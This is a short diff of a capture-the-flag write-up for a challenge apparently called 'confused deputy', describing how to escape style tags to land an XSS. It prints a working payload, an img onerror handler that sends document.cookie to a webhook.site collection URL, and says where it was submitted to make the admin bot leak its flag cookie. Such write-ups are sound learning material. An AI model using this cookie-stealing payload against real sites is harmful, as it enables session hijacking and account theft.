brandoncjh/CTF/csiCTF/confuseddeputy.md

 For our XSS payload to execute, we need to break out of the `<style>` tags.
 This is simply done by adding `</style>` to the front and `<style>` to the back of our existing payload.

-Final `colour` payload:
+Final `color` payload:
 ```
 <></style><img src=/ onerror="javascript:document.location='https://webhook.site/be022da0-4d21-4882-9dc3-051a5abe875d?c='+document.cookie"></img><style>
 ```

-We submit our payload to admin, with the URL input as `http://chall.csivit.com:30256/view`, and our webhook site should retrieve the cookie that contains the flag.
+At `/admin`, we submit our payload in the `color` field to admin, with the `URL` field as `http://chall.csivit.com:30256/view`, and our webhook site should retrieve the cookie that contains the flag.

 ![](images/deputy_flag.PNG)